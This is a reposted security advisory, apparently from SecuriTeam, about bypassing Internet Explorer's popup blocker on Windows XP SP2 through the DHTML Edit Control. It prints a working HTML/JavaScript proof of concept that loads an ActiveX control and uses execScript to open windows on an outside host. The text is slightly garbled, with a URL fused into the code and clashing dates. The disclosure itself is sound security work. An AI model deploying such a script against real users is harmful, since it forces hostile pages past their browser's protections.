Windows XP SP2广告弹出控制插件绕过漏洞已经测试方法
来源:互联摘选 日期:2003年09月25日 18:37:25
信息来源:securiteam.com & 邪恶八进制中国 [E.S.T]
Added by: A^C^E
Date: 14.12.04
Time: 10:27:05
Category: Exploits
Source:
http://www.securiteam.com/windowsntfocus/6Y00D0UC0K.html Summary
Internet Explorer for XP updated with SP2 enjoys a fairly robust popup blocking mechanism. In fact, older vulnerabilities exploited by many sites are no longer possible with the introduction of SP2 and the new popup blocker.
A way to circumvent the popup blocker has been found and it is easily exploitable as can be seen by the proof of concept supplied with this advisory.
Details
Vulnerable Systems:
* Internet Explorer on Windows XP SP2
The vulnerability can be exploited in order to popup a dialog through the "DHTML Edit Control" with a customized script. Such a script is listed below as a proof of concept:
< body onload="setTimeout(' main() ',1000)">
< object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
< PARAM NAME="ActivateApplets" VALUE="1">
< PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
< SCRIPT>
// 10.11.04
http://www.editive.comfunction shellscript()
{
open("
http://www.malware.com/flywin.html","_blank","scrollbar=no");showModalDialog("
http://www.malware.com/flywin.html");}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
Additional information
The information has been provided by http-equiv.
(出处:http://www.Gimoo.net)
